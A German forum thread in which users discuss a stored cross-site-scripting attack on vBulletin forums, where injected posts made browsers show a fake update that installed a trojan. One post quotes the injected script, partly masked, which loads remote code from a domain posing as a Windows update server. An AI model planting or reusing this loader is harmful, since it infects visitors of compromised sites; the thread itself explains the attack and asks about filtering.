Beitrag wurde gelöscht und User gesperrt...
Allerdings hatte als es ausfiel der einzige Mod der gerade aktiv war, keine Rechte im BOS-Forum um auch den Beitrag zu löschen ;)
MfG Fabsi
Druckbare Version
joa und alles durch den scanner beim hochladen ?? glaube das würde viel speicher und zeit dauern .....
Sagt mal, kann mir jemand eine "von Hand" Anleitung zur Installation dieses Trojaners
geben ? Mein Linux will und will den einfach nicht automatisch starten ^^
Ich glaube, all die Apfel-User da draussen können von dem Problem auch dasselbe Lied
singen ..
All die nette Software, die sich automatisch aufdrängen will, und ich kann sie einfach
nicht nutzen :-(
Bei Äpfeln und Pinguinen kommt halt nicht alles durchs "Fenster" geflogen ;)
kann mir jmd als zufriedener windows nutzer erklären wie diese art angriff überhaupt funktioniert und keine sicherheitsmaßnahmen greifen?
Schwachstelle in der Forensoftware suchen, finden &nutzen-->javascript code einfüge-->Voila der Browser meldet Update
ah und wie wird der eingefügt?
was in den beitrag geschrieben oder während der beitrag an den server gesendet wird?
ich gehe davon aus, dass der schadcode, in das posting eingefügt wird.
Richtig. Ein Fehler(oder eine Fehlkonfiguration) in der Forensoftware sorgt dafür, dass man in den Postings ein
benutzen kann. Eine genauere Beschreibung des Exploit(inklusive "Mustecode") steht hierCode:{script}
Hier Schadcode nach wahl
{/script}
EDIT: Natürlich nehmen wir Spitze klammern für die Tags, aber selbst im "Code" Fenster werden die Scripte ausgeführt. Zumindest würde ich von Code erwarten, dass der Inhalt in jedem Fall plain durchgeht
achso...
ich dachte auch das die software sowas filtert....
naja...so schnell kanns gehen...kann man das aber nicht generell deaktivieren? das wird doch nicht wirklich gebraucht?
Dem Kerl scheint echt langweilig zu sein.... der registriert sich den ganzen Tag in sämtlichen v-Bulletin-Foren, klinkt sich in irgendwelche Beiträge ein und steckt jedes mal das gleiche Script rein... welches dann so aussieht:
XXXXXript language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>
</div>
<div align="center">
</XXXXX> (die XXX sind nur Platzhalter - damit das Ding etwas entschärft ist)
Würde mich interessieren, was er damit bezwecken will.... Vielleicht kommt er ja noch wieder und klärt uns auf.
achso:)
kann man das nicht filtern? also das nur moderatoren scripte nutzen dürfen?